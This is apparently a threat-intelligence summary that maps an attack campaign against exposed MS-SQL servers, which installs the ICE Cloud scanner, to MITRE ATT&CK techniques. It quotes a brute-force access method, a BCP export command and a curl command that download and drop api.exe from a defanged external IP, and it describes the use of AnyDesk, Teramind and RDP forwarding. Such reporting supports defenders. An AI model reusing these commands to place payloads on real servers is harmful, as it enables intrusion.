Attack case against MS-SQL server installing ICE Cloud scanner (Larva-26002)

MITRE Techniques

• [T1110 ] Brute Force – The actor gains initial access by performing brute force and dictionary attacks against exposed MS-SQL accounts. (‘Attacks against MS-SQL servers typically include brute force attacks and dictionary attacks against systems that improperly manage account information.’)
• [T1105 ] Ingress Tool Transfer – The threat actor transfers and creates tools on victims using MS-SQL BCP exports and direct downloads (curl/bitsadmin/PowerShell) to place api.exe on disk. (‘bcp “select binaryTable from uGnzBdZbsi” queryout “C:ProgramDataapi.exe” -T -f “C:ProgramDataFODsOZKgAU.txt”’ and ‘curl -o “C:programdataapi.exe” “hxxp://109.205.211[.]13/api.exe”’)
• [T1059 ] Command and Scripting Interpreter – The campaign uses command-line utilities and scripts (PowerShell, curl, bitsadmin, BCP commands) to execute downloads and create files. (‘curl -o “C:programdataapi.exe” “hxxp://109.205.211[.]13/api.exe”’)
• [T1071 ] Application Layer Protocol – ICE Cloud Launcher authenticates to and communicates with a C2 server to request and download the ICE Cloud Client and to report scan results. (‘ICE Cloud Launcher authenticates by sending the following packet to the C&C server and then sends a download request to download the scanner, “ICE Cloud Client”.’)
• [T1219 ] Remote Access Software – The actor installs remote access tools such as AnyDesk and uses RMM software (Teramind) to maintain interactive access and control. (‘the threat actor also installed AnyDesk for remote control and a port forwarder for RDP connections’ and ‘in addition to AnyDesk, he used Teramind, an RMM tool’)
• [T1021.001 ] Remote Services: RDP – The actor configures port forwarding and tests RDP connections to facilitate remote access to compromised systems. (‘As for the RDP protocol, there is a simple connection test function’)